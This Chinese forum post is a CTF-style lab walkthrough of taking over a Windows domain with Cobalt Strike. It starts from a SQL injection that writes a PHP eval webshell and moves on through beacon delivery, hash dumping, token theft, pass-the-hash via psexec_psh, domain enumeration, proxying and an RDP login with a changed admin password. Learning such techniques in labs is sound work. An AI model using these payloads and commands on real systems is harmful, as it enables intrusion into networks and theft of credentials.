吾爱破解 - LCG - LSG |安卓破解|病毒分析|www.52pojie.cn

 找回密码
 注册[Register]

QQ登录

只需一步,快速开始

查看: 4568|回复: 14
收起左侧

[CTF] 【CTF】 CobaltStrike超简单自动化拿域控学习!

  [复制链接]
孤樱懶契 发表于 2021-9-10 20:09
本帖最后由 孤樱懶契 于 2021-10-23 22:48 编辑

前言

环境:http://afsgr16-b1ferw.aqlab.cn/?id=1

工具:CobaltStrike 3.14 学习

最近学习CobaltStrike,所以写一篇关于CobaltStrike的姿势

有一些细节上的在上篇文章-传送门
上篇文章都讲过了就不赘述了,拿到shell上蚁剑

http://afsgr16-b1ferw.aqlab.cn/?id=1.1 union select 1,"<?php eval($_REQUEST[gylq]);?>"  into outfile 'C:/phpstudy/www/shell.php' 

image-20210825125125629

②蚁剑连接,发现权限很低

image-20210825125351402

CobaltStrike超简单拿域控

由于大部分师傅可能都不知道CobaltStrike是啥,我说一下怎么开teamserver,和启动CobaltStrike,具体原理请百度

一、启动CobaltStrike

1、先将CobaltStrike放入kali中,然后启动teamserve命令

 ./teamserver 192.168.1.105 123456

image-20210910190706634

2、在我的电脑中启动CobaltStrike,连上50050端口密码123456,主机是我们刚刚设置的ip地址也就是kali的ip地址,具体看图

image-20210910190843123

二、脚本web传递拿beacon

1、打开监听器,反弹http的beacon,监听我们内网穿透的端口和地址,如果有师傅不知道内网穿透的话,可以看我上篇文章

image-20210910191104374

2、在攻击里面找到脚本web传递

image-20210910191004064

2、按图设置

image-20210910191134314

3、将生成的代码保存起来

image-20210910191211759

4、在蚁剑中执行这段代码就可以拿到shell了

image-20210910191237891

5、接着CobaltStrike自动就上线了

image-20210910191330778

6、提权就成功了选择自己一开始的监听器

image-20210910191401692

7、接着就反弹一个system的beacon

image-20210910191440237

8、这里可以转到msf探测一下C段,但是我们已经知道10.0.1.8这个ip,可以直接hash传递得到beacon,先制作一个令牌

①先hashdump导出hash

image-20210910191706672

②制作令牌就会自动获取我们刚刚导入的hash

image-20210910191725856

③记得选择admin开头的接着令牌就成功了

image-20210910191929958

9、利用令牌直接hash传递拿到10.0.1.8这台机子的system权限

①设置一个监听直连smb,端口随意

image-20210910192200382

②执行下面命令

psexec_psh 10.0.1.8 smb-beacon

image-20210910192238867

③接着10.0.1.8这台机子就上线了,smb形式就是445端口

image-20210910192308245

三、拿域控之前的CobaltStrike命令积累学习

由于我们知道域控机子ip就是10.0.1.6,上篇文章讲过了,就不复述的去实践扫描了,直接开始命令学习

1、查看当前用户组

shell whoami/groups

image-20210910192520024

2、查看域

shell net view /domain

image-20210910192559695

3、枚举域内主机

shell net view /domain:GYLQ
shell net group "domain Computers" /domain #这个也可以

image-20210910192730087

4、查看DC域控主机

shell net group "domain Controllers" /domain
shell nltest/dclist:GYLQ #也可以

image-20210910192947731

5、查看DC的ip

image-20210910192836844

6、查看域的信任关系

image-20210910193026550

7、powershell导入power-view模块,去github找一个powertools,这部分只是学习命令,可以跳过

image-20210910193230115

powershell Invoke-ACLScanner //查看域的信息

image-20210910193456464

2、查看共享文件夹情况

powershell Invoke-ShareFinder

image-20210910193617172

四、CobaltStrike自动化拿域控?

上面的漫长的废话搞完了,接下来实操。

1、打开文件管理,看到域控有登陆过这台机子,刚好我们换成域控权限,PID是1796

image-20210910193935194

2、盗取token

image-20210910194011043

3、利用共享文件夹发现可以访问域控的C盘了,这时能拿域控的方法太多,我随便选一个

image-20210910194043684

4、直接用拿10.0.1.8的方法拿10.0.1.6,简直不要太简单了好吧,我上篇文章还要转来转去,接着DC就上线了。

psexec_psh 10.0.1.6 smb-beacon

image-20210910194754682

5、怎么进人域控的桌面,接着挂个socks代{过}{滤}理

①进入这里

image-20210910195125669

②接着socks1080

image-20210910195149475

③然后将其中的一个管理员的密码改成testTEST123

image-20210910195456209

④利用proxychains4代{过}{滤}理连上去,不懂看上篇文章,写的很详细

proxychains4 rdesktop -u administrator -p woshifengge1. 10.0.1.8

image-20210910195641421

总结

最近学了CobaltStrike才知道这就点几下就拿域控了,不需要复杂的命令。下次加油。

免费评分

参与人数 6吾爱币 +11 热心值 +6 收起 理由
xiaoxuetu + 1 谢谢@Thanks!
Hmily + 7 + 1 欢迎分析讨论交流,吾爱破解论坛有你更精彩!
xhever + 1 + 1 热心回复!
Mystery_ + 1 + 1 我很赞同!
笙若 + 1 + 1 谢谢@Thanks!
qq63 + 1 + 1 感谢发布原创作品,吾爱破解论坛因你更精彩!

查看全部评分

发帖前要善用论坛搜索功能,那里可能会有你要找的答案或者已经有人发布过相同内容了,请勿重复发帖。

safer 发表于 2021-9-10 20:36
感谢分享。
无颜剑客 发表于 2021-9-10 21:08
bozai008 发表于 2021-9-10 21:40
wangxiaohang 发表于 2021-9-10 21:59
感谢分享
haozi081127 发表于 2021-9-10 23:59
这个很实用
xiaoxi2011 发表于 2021-9-11 00:09
学习了,谢谢分享
Mystery_ 发表于 2021-9-11 00:43
感谢分享
cj2001 发表于 2021-9-11 00:53
谢谢分享,正在学
adq135158 发表于 2021-9-11 14:27

谢谢分享,正在学
您需要登录后才可以回帖 登录 | 注册[Register]

本版积分规则 警告:本版块禁止灌水或回复与主题无关内容,违者重罚!

快速回复 收藏帖子 返回列表 搜索

RSS订阅|小黑屋|处罚记录|联系我们|吾爱破解 - LCG - LSG ( 京ICP备16042023号 | 京公网安备 11010502030087号 )

GMT+8, 2024-3-29 15:30

Powered by Discuz!

Copyright © 2001-2020, Tencent Cloud.

快速回复 返回顶部 返回列表